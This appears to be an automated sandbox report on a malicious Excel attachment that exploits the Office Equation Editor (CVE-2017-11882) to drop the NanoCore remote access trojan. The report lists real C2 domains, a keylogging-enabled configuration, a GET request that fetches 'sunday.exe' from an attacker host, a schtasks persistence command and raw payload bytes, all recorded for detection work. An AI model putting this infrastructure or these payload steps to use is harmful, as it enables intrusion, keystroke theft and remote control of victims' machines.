Loading ...

Play interactive tourEdit tour

Windows Analysis Report Sts Global Order.xlsx

Overview

General Information

Sample Name:Sts Global Order.xlsx
Analysis ID:508452
MD5:32f28af7bfd53e685b4cb23daa435ac1
SHA1:2b8161a2ff19950d6767cc1adbd7b85af04a335b
SHA256:52601a9c0c289aa1e3de03a32f2c7c2d47c94685e3bc58b06c6932f1b65a88ca
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Yara detected AntiVM3
Detected Nanocore Rat
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected Nanocore RAT
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 508 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1160 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2696 cmdline: 'C:\Users\Public\vbc.exe' MD5: 5DC1D41E2F9969D85896921F7B4AE261)
      • schtasks.exe (PID: 1940 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\CXFxEHIAOoJFws' /XML 'C:\Users\user\AppData\Local\Temp\tmp98E5.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • RegSvcs.exe (PID: 1828 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe MD5: 72A9F09010A89860456C6474E2E6D25C)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "dcf3fee6-c103-45ee-a2f0-f8afaa78", "Group": "A New TIme Has Come", "Domain1": "newme122.3utilities.com", "Domain2": "newme1122.3utilities.com", "Port": 8822, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.675353317.0000000000CD0000.00000004.00020000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x5b99:$x1: NanoCore.ClientPluginHost
  • 0x5bb3:$x2: IClientNetworkHost
00000007.00000002.675353317.0000000000CD0000.00000004.00020000.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x5b99:$x2: NanoCore.ClientPluginHost
  • 0x6bce:$s4: PipeCreated
  • 0x5b86:$s5: IClientLoggingHost
00000007.00000002.675022764.0000000000570000.00000004.00020000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xe75:$x1: NanoCore.ClientPluginHost
  • 0xe8f:$x2: IClientNetworkHost
00000007.00000002.675022764.0000000000570000.00000004.00020000.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0xe75:$x2: NanoCore.ClientPluginHost
  • 0x1261:$s3: PipeExists
  • 0x1136:$s4: PipeCreated
  • 0xeb0:$s5: IClientLoggingHost
00000007.00000002.675802769.00000000012A0000.00000004.00020000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x5fee:$x1: NanoCore.ClientPluginHost
  • 0x602b:$x2: IClientNetworkHost
Click to see the 38 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
7.2.RegSvcs.exe.6f0000.2.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x4bbb:$x1: NanoCore.ClientPluginHost
  • 0x4be5:$x2: IClientNetworkHost
7.2.RegSvcs.exe.6f0000.2.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x4bbb:$x2: NanoCore.ClientPluginHost
  • 0x6a6b:$s4: PipeCreated
7.2.RegSvcs.exe.b70000.8.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x1deb:$x1: NanoCore.ClientPluginHost
  • 0x1e24:$x2: IClientNetworkHost
7.2.RegSvcs.exe.b70000.8.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x1deb:$x2: NanoCore.ClientPluginHost
  • 0x1f36:$s4: PipeCreated
  • 0x1e05:$s5: IClientLoggingHost
4.2.vbc.exe.35ce168.3.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x1018d:$x1: NanoCore.ClientPluginHost
  • 0x101ca:$x2: IClientNetworkHost
  • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Click to see the 86 entries

Sigma Overview

AV Detection:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 1828, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Exploits:

barindex
Sigma detected: EQNEDT32.EXE connecting to internetShow sources
Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 31.3.244.76, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1160, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXEShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1160, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\sunday[1].exe

E-Banking Fraud:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 1828, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

System Summary:

barindex
Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1160, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2696
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ParentCommandLine: 'C:\Users\Public\vbc.exe' , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 2696, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 1828
Sigma detected: Execution from Suspicious FolderShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1160, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2696
Sigma detected: Possible Applocker BypassShow sources
Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ParentCommandLine: 'C:\Users\Public\vbc.exe' , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 2696, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 1828

Stealing of Sensitive Information:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 1828, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Remote Access Functionality:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 1828, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Found malware configurationShow sources
Source: 00000007.00000002.676414114.00000000038BF000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "dcf3fee6-c103-45ee-a2f0-f8afaa78", "Group": "A New TIme Has Come", "Domain1": "newme122.3utilities.com", "Domain2": "newme1122.3utilities.com", "Port": 8822, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
Antivirus detection for URL or domainShow sources
Source: newme1122.3utilities.comAvira URL Cloud: Label: phishing
Source: newme122.3utilities.comAvira URL Cloud: Label: phishing
Multi AV Scanner detection for domain / URLShow sources
Source: newme122.3utilities.comVirustotal: Detection: 8%Perma Link
Source: newme1122.3utilities.comVirustotal: Detection: 12%Perma Link
Source: newme122.3utilities.comVirustotal: Detection: 8%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\sunday[1].exeVirustotal: Detection: 44%Perma Link
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 4.2.vbc.exe.35ce168.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.38c3038.20.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.d10000.12.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.d14629.11.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.d10000.12.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.38c3038.20.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.38c7661.18.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 4.2.vbc.exe.35ce168.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000004.00000002.484474935.00000000034E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.676414114.00000000038BF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.674937327.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.675417808.0000000000D10000.00000004.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.484758487.0000000003673000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1828, type: MEMORYSTR
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\CXFxEHIAOoJFws.exeJoe Sandbox ML: detected
Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\sunday[1].exeJoe Sandbox ML: detected
Source: 7.2.RegSvcs.exe.d10000.12.unpackAvira: Label: TR/NanoCore.fadte
Source: 7.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: indows\RegSvcs.pdbpdbvcs.pdbg source: RegSvcs.exe, 00000007.00000002.675191803.0000000000778000.00000004.00000040.sdmp
Source: Binary string: wvcs.pdb source: RegSvcs.exe, 00000007.00000002.677037121.0000000004A5D000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.675191803.0000000000778000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\RegSvcs.pdbD source: RegSvcs.exe, 00000007.00000002.675191803.0000000000778000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.675191803.0000000000778000.00000004.00000040.sdmp
Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000007.00000002.675867862.00000000026D1000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegSvcs.exe, 00000007.00000002.675867862.00000000026D1000.00000004.00000001.sdmp
Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegSvcs.exe, 00000007.00000002.675867862.00000000026D1000.00000004.00000001.sdmp
Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000007.00000002.675867862.00000000026D1000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\exe\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.675191803.0000000000778000.00000004.00000040.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegSvcs.exe, 00000007.00000002.675867862.00000000026D1000.00000004.00000001.sdmp
Source: global trafficDNS query: name: itisalllove.servepics.com
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 4x nop then mov esp, ebp
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 31.3.244.76:80
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 31.3.244.76:80

Networking:

barindex
C2 URLs / IPs found in malware configurationShow sources
Source: Malware configuration extractorURLs: newme1122.3utilities.com
Source: Malware configuration extractorURLs: newme122.3utilities.com
Source: Joe Sandbox ViewASN Name: LEASEWEB-USA-NYC-11US LEASEWEB-USA-NYC-11US
Source: Joe Sandbox ViewASN Name: IOMART-ASGB IOMART-ASGB
Source: Joe Sandbox ViewIP Address: 23.105.131.228 23.105.131.228
Source: Joe Sandbox ViewIP Address: 31.3.244.76 31.3.244.76
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 25 Oct 2021 07:13:41 GMTServer: Apache/2.4.49 (Win64) OpenSSL/1.1.1l PHP/8.0.11Last-Modified: Sun, 24 Oct 2021 07:30:25 GMTETag: "109200-5cf1437cbe55c"Accept-Ranges: bytesContent-Length: 1085952Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 88 0b 75 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 88 10 00 00 08 00 00 00 00 00 00 7e a6 10 00 00 20 00 00 00 c0 10 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 11 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 a6 10 00 4b 00 00 00 00 c0 10 00 a8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 10 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 86 10 00 00 20 00 00 00 88 10 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a8 05 00 00 00 c0 10 00 00 06 00 00 00 8a 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 10 00 00 02 00 00 00 90 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 a6 10 00 00 00 00 00 48 00 00 00 02 00 05 00 b4 9d 00 00 84 5c 00 00 03 00 00 00 f3 00 00 06 38 fa 00 00 eb ab 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 fd 00 00 00 01 00 00 11 2b 02 26 16 28 06 00 00 06 28 07 00 00 06 3a 92 00 00 00 26 20 08 00 00 00 38 37 00 00 00 38 b1 00 00 00 06 07 28 02 00 00 06 0c 20 05 00 00 00 38 20 00 00 00 00 1f 14 28 04 00 00 06 00 00 07 17 58 0b 38 8c 00 00 00 20 08 00 00 00 fe 0e 03 00 fe 0c 03 00 45 0b 00 00 00 16 00 00 00 1a 00 00 00 0a 00 00 00 af ff ff ff 39 00 00 00 64 00 00 00 2a 00 00 00 4e 00 00 00 16 00 00 00 98 ff ff ff 75 00 00 00 20 07 00 00 00 38 c5 ff ff ff 16 0b 20 09 00 00 00 38 b9 ff ff ff 00 00 02 0a 38 eb ff ff ff 26 20 02 00 00 00 38 a5 ff ff ff 28 05 00 00 06 20 04 00 00 00 38 96 ff ff ff 00 20 dc 05 00 00 28 04 00 00 06 20 0a 00 00 00 38 81 ff ff ff 07 06 6f 0e 00 00 0a 3f 43 ff ff ff 20 06 00 00 00 38 6b ff ff ff 00 08 28 03 00 00 06 20 03 00 00 00 38 5a ff ff ff 00 2a 00 00 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 6f 0f 00 00 0a 2a 00 3e 2b 02 26 16 00 fe
Source: global trafficHTTP traffic detected: GET /georgia/city/sunday.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: itisalllove.servepics.comConnection: Keep-Alive
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 23.105.131.228:8822
Source: RegSvcs.exe, 00000007.00000002.675867862.00000000026D1000.00000004.00000001.sdmpString found in binary or memory: http://google.com
Source: vbc.exe, 00000004.00000002.493501284.0000000007820000.00000002.00020000.sdmp, RegSvcs.exe, 00000007.00000002.677233027.0000000004F20000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.493501284.0000000007820000.00000002.00020000.sdmp, RegSvcs.exe, 00000007.00000002.677233027.0000000004F20000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000004.00000002.478159349.0000000000940000.00000004.00020000.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3DB8310A.emfJump to behavior
Source: unknownDNS traffic detected: queries for: itisalllove.servepics.com
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_00532B9E WSARecv,
Source: global trafficHTTP traffic detected: GET /georgia/city/sunday.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: itisalllove.servepics.comConnection: Keep-Alive
Source: RegSvcs.exe, 00000007.00000002.676414114.00000000038BF000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

E-Banking Fraud:

barindex
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 4.2.vbc.exe.35ce168.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.38c3038.20.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.d10000.12.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.d14629.11.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.d10000.12.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.38c3038.20.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 7.2.RegSvcs.exe.38c7661.18.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 4.2.vbc.exe.35ce168.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000004.00000002.484474935.00000000034E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.676414114.00000000038BF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.674937327.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000007.00000002.675417808.0000000000D10000.00000004.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.484758487.0000000003673000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1828, type: MEMORYSTR

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 7.2.RegSvcs.exe.6f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.b70000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.35ce168.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.35ce168.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.RegSvcs.exe.4724c9f.22.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.26f23d8.17.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.7a0000.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.7c0000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.7a0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.4720000.23.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.12a0000.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.4720000.23.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.b70000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.7c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.38c3038.20.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
